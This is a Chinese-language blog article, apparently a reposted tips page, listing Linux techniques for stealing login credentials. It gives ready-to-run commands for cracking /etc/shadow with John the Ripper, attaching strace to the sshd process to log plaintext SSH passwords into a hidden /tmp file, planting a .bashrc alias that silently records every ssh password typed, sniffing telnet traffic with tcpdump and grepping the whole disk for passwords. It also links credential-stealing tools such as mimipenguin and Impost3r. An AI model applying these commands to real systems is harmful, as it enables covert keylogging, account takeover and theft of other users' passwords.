共计 1828 个字符,预计需要花费 5 分钟才能阅读完成。
这篇文章主要介绍了 Linux 下爬取登录凭证的技巧有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让丸趣 TV 小编带着大家一起了解一下。
仅供参考学习
01、history 记录敏感操作
Linux 系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致敏感信息泄露。
02、shadow 文件破解
shadow 用于存储 Linux 系统中用户的密码信息,以一个用例来说明:
root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::
密码域密文由三部分组成,即:$idsalt$encrypted。当 id=1,采用 md5 进行加密,弱口令容易被破解。
当 id 为 5 时,采用 SHA256 进行加密,id 为 6 时,采用 SHA512 进行加密,可以通过 john 进行暴力破解。
wget https://www.openwall.com/john/k/john-1.9.0.tar.gz tar -zxvf john-1.9.0.tar.gz make clean linux-x86-64 ./john /etc/shadow
03、mimipenguin 抓取密码
一款 Linux 下的密码抓取神器,需要 root 权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持 Kali、Ubnutu 等操作系统。
Github 地址:
https://github.com/huntergregal/mimipenguin
04、使用 Strace 收集登录凭证
strace 是一个动态跟踪工具,堪比键盘记录器的存在,可用来收集登录凭证。
(1)获取 sshd 进程明文密码
(strace -f -F -p `ps aux|grep sshd -D |grep -v grep|awk { print $2}` -t -e trace=read,write -s 32 2 /tmp/.sshd.log )
使用正在来匹配用户和密码
# 查找用户名和密码 grep -E read\(6, .+\\0\\0\\0\\.+ /tmp/.sshd.log # 结果形式如下 [pid 2401] 22:34:34 read(6, \10\0\0\0\4root , 9) = 9 [pid 2401] 22:34:34 read(6, \4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0 , 27) = 27 [pid 2401] 22:34:34 read(6, \f\0\0\0\4toor , 9) = 9
(2)收集 ssh 登陆凭证
# 添加命令别名 vi ~/.bashrc 或者 /etc/bashrc alias ssh= strace -f -e trace=read,write -o /tmp/.ssh-`date +%d%h%m%s `.log -s 32 ssh # 使命令别名立即生效 source ~/.bashrc
通过 grep 找到匹配行的后 8 行,可以根据密码长度调整行数
grep -A 9 password .ssh-25Sep091601017212.log
05、tcpdump 抓包分析
抓取数据包进行分析,获取明文账号密码,比如 ftp、telnet、http。
tcpdump -i ens33 port 23 -w test.cap
06、全盘搜索敏感信息
全局搜索配置文件、脚本、数据库、日志文件是否有包含密码。
grep -rn password= /
07、swap_digger
一个用于自动进行 Linux 交换分析 bash 脚本,自动进行交换提取,并搜索 Linux 用户凭据,Web 表单凭据,Web 表单电子邮件,HTTP 基本身份验证,WiFi SSID 和密钥等。
github 项目地址:
https://github.com/sevagas/swap_digger
08、Impost3r
一个利用 C 语言编写, 用来窃取 linux 下各类密码 (ssh,su,sudo) 的工具。
github 项目地址:
https://github.com/ph5ntonn/Impost3r
感谢你能够认真阅读完这篇文章,希望丸趣 TV 小编分享的“Linux 下爬取登录凭证的技巧有哪些”这篇文章对大家有帮助,同时也希望大家多多支持丸趣 TV,关注丸趣 TV 行业资讯频道,更多相关知识等着你来学习!